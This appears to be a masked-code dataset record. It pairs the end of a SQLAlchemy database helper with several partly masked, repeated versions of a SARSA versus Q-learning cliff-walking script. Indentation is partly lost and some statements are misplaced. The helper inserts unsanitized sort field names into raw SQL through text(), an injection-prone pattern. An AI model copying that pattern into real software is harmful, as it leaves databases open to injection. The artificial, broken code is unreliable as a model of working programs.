},
'items': []
}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
data = query.offset((page-1)*per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), limit:int=0)->list:
        '''Fetch all rows matching the conditions
        @param BaseMixin cls database model entity class
        @param set filters query conditions
        @param str order sort order
        @param tuple field fields to return
        @param int limit maximum number of rows to fetch
        @return list
'''
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
if limit != 0:
query = query.limit(limit)
        items = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=())->dict:
        '''Fetch the first row matching the conditions
        @param BaseMixin cls database model entity class
        @param set filters query conditions
        @param str order sort order
        @param tuple field fields to return
        @return dict
'''
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_:BaseMixin, data:dict)->int:
        '''Insert one row
        @param BaseMixin cls database model entity class
        @param dict data column values for the new row
        @return int primary key of the inserted row
'''
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_:BaseMixin, data:dict, filters:set)->int:
        '''Update data
        @param BaseMixin cls database model entity class
        @param dict data column values to set
        @param set filters filter conditions
        @return int number of affected rows
'''
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
return query.update(data, synchronize_session=False)
def delete(self, cls_:BaseMixin, filters:set)->int:
        '''Delete data
        @param BaseMixin cls database model entity class
        @param set filters filter conditions
        @return int number of affected rows
'''
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at==0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session=False)
db.commit()
return affect_rows
def count(self, cls_:BaseMixin, filters:set, field=None)->int:
        '''Count the rows matching the conditions
        @param BaseMixin cls database model entity class
        @param set filters filter conditions
        @param string|None field field to count on
        @return int
'''
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
if field is None:
return query.count()
else:
return query.count(field)
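# Minimal usage sketch (hypothetical `User` model built on BaseMixin):
#   mgr = BaseDBMgr()
#   page = mgr.get_page(User, {User.name == 'alice'}, orders=[('id', 'desc')])
#   total = mgr.count(User, {User.name == 'alice'})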
| [
5,
7,
8,
10,
11
] |
40 | cb2e800cc2802031847b170a462778e5c0b3c6f9 | <mask token>
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
<mask token>
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
<mask token>
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
    plt.grid(axis='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
<mask token>
| <mask token>
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
<mask token>
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
<mask token>
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
    plt.grid(axis='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
    print('invalid method. must be Q_LEARNING, SARSA or BOTH')
import sys
sys.exit()
<mask token>
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
| <mask token>
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
    plt.grid(axis='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
    print('invalid method. must be Q_LEARNING, SARSA or BOTH')
import sys
sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
| from random import random, randint
import numpy as np
import matplotlib.pyplot as plt
from colorama import Fore, Back, Style
from gridworld import q_to_arrow
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
    plt.grid(axis='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
    print('invalid method. must be Q_LEARNING, SARSA or BOTH')
import sys
sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
